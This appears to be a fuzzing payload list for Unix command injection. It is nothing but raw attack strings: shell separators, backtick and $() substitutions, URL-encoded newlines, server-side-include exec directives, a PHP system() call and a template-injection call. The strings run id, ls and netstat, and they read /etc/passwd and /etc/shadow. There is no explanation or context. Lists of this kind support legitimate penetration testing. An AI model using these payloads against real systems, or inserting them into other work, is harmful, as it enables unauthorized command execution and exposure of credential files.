Unix :
/index.html|id|
;netstat -a;
;system('cat%20/etc/passwd')
;system('id')
|/usr/bin/id|
||/usr/bin/id|
|id;
\n/bin/ls -al\n
\n/usr/bin/id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
`${print `id`}`
${print `pwd`}
${echo `pwd`}
$(`cat /etc/passwd`)
;phpinfo()
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
{{ get_user_file("/etc/passwd") }}
<!--#exec cmd="/usr/bin/id;-->
<?php system("cat /etc/passwd");?>
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
